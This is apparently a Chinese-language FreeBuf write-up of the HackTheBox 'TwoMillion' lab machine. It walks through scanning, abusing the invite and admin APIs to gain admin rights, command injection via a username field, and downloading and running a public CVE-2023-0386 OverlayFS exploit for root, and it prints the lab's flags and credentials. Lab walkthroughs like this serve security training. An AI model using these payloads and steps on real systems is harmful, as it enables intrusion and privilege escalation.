官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
maptnh- 关注
本文由
maptnh 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.221 | TCP:22,80 |
$ sudo masscan -p1-65535,U:1-65535 10.10.11.221 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')$ nmap -Pn -sV -sC -p$ports 10.10.11.221
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx
|_http-title: Did not follow redirect to http://2million.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
JS Code Deobfuscation && Unauthorized API Access RCE
# echo '10.10.11.221 2million.htb'>>/etc/hosts
$ dirsearch -u http://2million.htb
view-source:http://2million.htb/js/inviteapi.min.js
JavaScript 混淆代码解析
function verifyInviteCode(code) {
var formData = { "code": code };
$.ajax({
type: "POST",
dataType: "json",
data: formData,
url: '/api/v1/invite/verify',
success: function(response) {
console.log(response);
},
error: function(response) {
console.log(response);
}
});
}
function makeInviteCode() {
$.ajax({
type: "POST",
dataType: "json",
url: '/api/v1/invite/generate',
success: function(response) {
console.log(response);
},
error: function(response) {
console.log(response);
}
});
}
$ echo 'Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr'|tr 'A-Za-z' 'N-ZA-Mn-za-m'
POST /api/v1/invite/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
DATV8-W1GS1-U5MY1-E43OY
http://2million.htb/home
用户 API
| 请求方式 | 路由 | 说明 |
|---|---|---|
| GET | /api/v1 | 路由列表 |
| GET | /api/v1/invite/how/to/generate | 邀邀请码生成说明 |
| GET | /api/v1/invite/generate | 生成邀请码 |
| GET | /api/v1/invite/verify | 验证邀请码 |
| GET | /api/v1/user/auth | 检查用户是否已认证 |
| GET | /api/v1/user/vpn/generate | 生成新的 VPN 配置 |
| GET | /api/v1/user/vpn/regenerate | 重新生成 VPN 配置 |
| GET | /api/v1/user/vpn/download | 下载 OVPN 文件 |
| POST | /api/v1/user/register | 注册新用户 |
| POST | /api/v1/user/login | 登录已有用户 |
管理员 API
| 请求方式 | 路由 | 说明 |
|---|---|---|
| GET | /api/v1/admin/auth | 检查用户是否为管理员 |
| POST | /api/v1/admin/vpn/generate | 为特定用户生成 VPN |
| PUT | /api/v1/admin/settings/update | 更新用户设置 |
GET /api/v1/user/vpn/download HTTP/1.1
openvpn配置文件
查看权限
升级管理员
PUT /api/v1/admin/settings/update HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 47
{
"email":"maptnh@gmail.com",
"is_admin":1
}
POST /api/v1/admin/vpn/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Referer: http://2million.htb/home/rules
Connection: close
Cookie: PHPSESSID=11hkqh03a638kn4bsphv86bqr2
Upgrade-Insecure-Requests: 1
Content-Length: 35
{
"username":"maptnh@gmail.com"
}
{
"username":"x|id #"
}
username:adminpassword:SuperDuperPass123
$ ssh admin@10.10.11.221
User.txt
6a9c99994e4334df9edc1fc13bca997b
Privilege Escalation:OverlayFS
在/var/spool/mail/admin有一封邮件
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2
Hey admin,
I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.
HTB Godfather
提到了 OverlayFS / FUSE 漏洞
$ git clone https://github.com/puckiestyle/CVE-2023-0386.git
$ tar -czvf CVE-2023-0386.tar.gz ./CVE-2023-0386
admin@2million:/tmp$ wget http://10.10.16.16/CVE-2023-0386.tar.gz
admin@2million:/tmp$ tar -zxvf CVE-2023-0386.tar.gz
admin@2million:/tmp/CVE-2023-0386$ make all
admin@2million:/tmp/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc
admin@2million:/tmp/CVE-2023-0386$ ./exp
Root.txt
35ed55b48c40b4a093970f40eda0281c
已在FreeBuf发表 296 篇文章
HackTheBox
![[Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限提升+路径劫持](https://image.3001.net/images/20250224/1740405828_67bc7c440179a1d9894eb.png)
![[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储权限提升](https://image.3001.net/images/20250224/1740329778_67bb533263d20f11eb595.png)
![[Meachines] [Easy] ScriptKiddie Msfvenom RCE+TRP00F权限提升+Shell -d 命令注入+msfconsole权限提升](https://image.3001.net/images/20250221/1740068049_67b754d1c6b98b84ac081.png)
![[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升](https://image.3001.net/images/20250220/1740053123_67b71a836ee0487ce1e4a.png)
- 296 文章数
- 60 关注者